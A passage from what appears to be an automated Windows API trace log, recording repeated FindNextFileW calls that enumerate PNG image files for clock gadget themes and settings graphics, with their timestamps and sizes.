ftCreationTime.dwLowDateTime=0x285ac06b, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x285ac06b, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x285d21c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6530, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer.png", cAlternateFileName="")) returned 1 [0103.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828d4d58, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828d4d58, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285d21c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x132, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_dot.png", cAlternateFileName="")) returned 1 [0103.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82888a9e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82888a9e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285d21c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_h.png", cAlternateFileName="")) returned 1 [0103.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828aebfb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828aebfb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285f8327, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_m.png", cAlternateFileName="")) returned 1 [0103.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828d4d58, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828d4d58, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285f8327, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_s.png", cAlternateFileName="")) returned 1 [0103.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828d4d58, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828d4d58, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7454, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_settings.png", cAlternateFileName="")) returned 1 [0103.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828faeb5, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828faeb5, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x77b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner.png", cAlternateFileName="")) returned 1 [0103.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294716f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8294716f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_dot.png", cAlternateFileName="")) returned 1 [0103.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828faeb5, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828faeb5, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_h.png", cAlternateFileName="")) returned 1 [0103.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82921012, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82921012, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x286445e3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_m.png", cAlternateFileName="")) returned 1 [0103.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82921012, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82921012, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x286445e3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_s.png", cAlternateFileName="")) returned 1 [0103.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8296d2cc, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8296d2cc, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2866a741, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7fb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_settings.png", cAlternateFileName="")) returned 1 [0103.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82993429, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82993429, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2866a741, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x876e, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower.png", cAlternateFileName="")) returned 1 [0103.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829df6e3, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x829df6e3, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2866a741, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x141, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_dot.png", cAlternateFileName="")) returned 1 [0103.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82993429, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82993429, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2866a741, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x184, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_h.png", cAlternateFileName="")) returned 1 [0103.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829b9586, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x829b9586, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287c138f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_m.png", cAlternateFileName="")) returned 1 [0103.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829b9586, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x829b9586, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287c138f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc14, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_s.png", cAlternateFileName="")) returned 1 [0103.802] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a05840, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a05840, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287e74ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x827b, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_settings.png", cAlternateFileName="")) returned 1 [0103.802] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a05840, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a05840, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287e74ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3cfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern.png", cAlternateFileName="")) returned 1 [0103.802] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a51afa, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a51afa, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287e74ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_dot.png", cAlternateFileName="")) returned 1 [0103.802] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a2b99d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a2b99d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2880d64b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_h.png", cAlternateFileName="")) returned 1 [0103.802] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a2b99d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a2b99d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2880d64b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_m.png", cAlternateFileName="")) returned 1 [0103.802] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a51afa, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a51afa, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2880d64b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbde, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_s.png", cAlternateFileName="")) returned 1 [0103.803] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a51afa, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a51afa, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288337a9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x51d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_settings.png", cAlternateFileName="")) returned 1 [0103.803] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a77c57, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a77c57, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288337a9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6408, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty.png", cAlternateFileName="")) returned 1 [0103.803] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82aea06e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82aea06e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288337a9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb57, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_dot.png", cAlternateFileName="")) returned 1 [0103.803] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a9ddb4, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a9ddb4, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28859907, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_h.png", cAlternateFileName="")) returned 1 [0103.803] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82ac3f11, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82ac3f11, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28859907, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_m.png", cAlternateFileName="")) returned 1 [0103.803] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82aea06e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82aea06e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28859907, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb67, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_s.png", cAlternateFileName="")) returned 1 [0103.804] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b101cb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b101cb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2887fa65, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x702e, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_settings.png", cAlternateFileName="")) returned 1 [0103.804] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cff384, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82cff384, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2887fa65, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_bottom.png", cAlternateFileName="")) returned 1 [0103.804] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d254e1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d254e1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288a5bc3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_divider_left.png", cAlternateFileName="")) returned 1 [0103.804] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d254e1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d254e1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288a5bc3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_divider_right.png", cAlternateFileName="")) returned 1 [0103.804] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4b63e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d4b63e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288cbd21, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_left.png", cAlternateFileName="")) returned 1 [0103.804] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4b63e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d4b63e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288f1e7f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_right.png", cAlternateFileName="")) returned 1 [0103.805] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4b63e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d4b63e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288f1e7f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_top.png", cAlternateFileName="")) returned 1 [0103.805] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d7179b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d7179b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288f1e7f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_bottom_left.png", cAlternateFileName="")) returned 1 [0103.805] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d7179b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d7179b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28a2296f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_bottom_right.png", cAlternateFileName="")) returned 1 [0103.805] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d7179b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d7179b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28a2296f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_top_left.png", cAlternateFileName="")) returned 1 [0103.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d978f8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d978f8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28a48acd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_top_right.png", cAlternateFileName="")) returned 1 [0103.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d978f8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d978f8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28a48acd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x83, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider.png", cAlternateFileName="")) returned 1 [0103.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d978f8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d978f8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28ae1045, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider_left.png", cAlternateFileName="")) returned 1 [0103.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d978f8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d978f8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b071a3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider_right.png", cAlternateFileName="")) returned 1 [0103.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dbda55, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82dbda55, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b2d301, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_disabled.png", cAlternateFileName="")) returned 1 [0103.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82de3bb2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82de3bb2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b2d301, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x41a, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_hover.png", cAlternateFileName="")) returned 1 [0103.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82de3bb2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82de3bb2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b5345f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x464, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_pressed.png", cAlternateFileName="")) returned 1 [0103.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e09d0f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e09d0f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b795bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_rest.png", cAlternateFileName="")) returned 1 [0103.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e09d0f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e09d0f, ftLastAccessTime.dwHighDateTime=0x1ca0403, 